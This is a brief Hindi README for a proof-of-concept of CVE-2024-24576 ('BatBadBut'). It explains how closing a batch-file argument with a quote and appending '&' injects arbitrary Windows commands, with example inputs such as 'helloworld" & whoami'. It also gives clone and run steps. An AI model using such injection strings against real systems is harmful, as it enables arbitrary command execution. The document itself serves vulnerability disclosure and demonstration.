
CVE-2024-24576 भेद्यता "BatBadBut" के लिए PoC
CVE-2024-24576 भेद्यता "BatBadBut" के लिए PoC
स्क्रिप्ट चलाने के बाद वह आपसे एक तर्क मांगेगी, वह तर्क बैट फ़ाइल को दिया जाएगा। यदि आप तर्क को " से बंद करते हैं और उसके बाद & लगाते हैं, तो आप कोई भी विंडोज कमांड चला सकते हैं। उदाहरण:
helloworld" & whoami
परिणामस्वरूप, आपको whoami कमांड मिलेगा।
बेशक वास्तविक समय में ऐसा नहीं दिखेगा, यह CVE के लिए केवल PoC है।
रिपॉजिटरी को क्लोन करें:
git clone https://github.com/SheL3G/CVE-2024-24576-PoC-BatBadBut.git
स्क्रिप्ट चलाना:
Python CVE-2024-24576.py
इसे काम करने के लिए कुछ ऐसा टाइप करें जो " से बंद हो और फिर "&" और कोई भी कमांड जैसे calc.exe, hostname, whoami...
HelloWorld" & hostname
CVE का प्रवाह और इसे काम करने का संभावित तरीका